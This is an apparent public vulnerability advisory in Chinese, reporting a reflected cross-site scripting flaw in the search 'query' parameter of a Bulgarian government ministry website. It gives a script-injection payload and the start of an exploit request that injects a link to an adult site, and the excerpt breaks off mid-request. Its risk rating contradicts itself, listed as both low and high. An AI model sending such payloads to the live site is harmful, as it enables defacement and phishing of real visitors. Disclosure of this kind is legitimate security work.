moew.government.bg 反射型跨站脚本漏洞

日期： 2025年11月13日
作者： nu11secur1ty
风险等级： 低
本地利用： 否
远程利用： 是
CVE： 无
CWE： 无

漏洞标题

moew.government.bg 反射型跨站脚本漏洞

基本信息

• 作者： nu11secur1ty
• 日期： 2025年11月10日
• 厂商： https://www.moew.government.bg/
• 软件： https://www.moew.government.bg/
• 参考： https://portswigger.net/web-security/cross-site-scripting

漏洞描述

注意： 目标网站在我一年前报告此问题后仍未响应。真是可耻！

查询请求参数的值被复制到HTML标签属性的值中，该属性使用双引号封装。payload mxrdv"><script>alert(1)</script>zt9br 被提交到查询参数中。此输入在应用程序的响应中未经修改地回显。

状态： 高危漏洞

漏洞利用

1

GET /bg/search/?query=%3Ca%20href=%22https://www.pornhub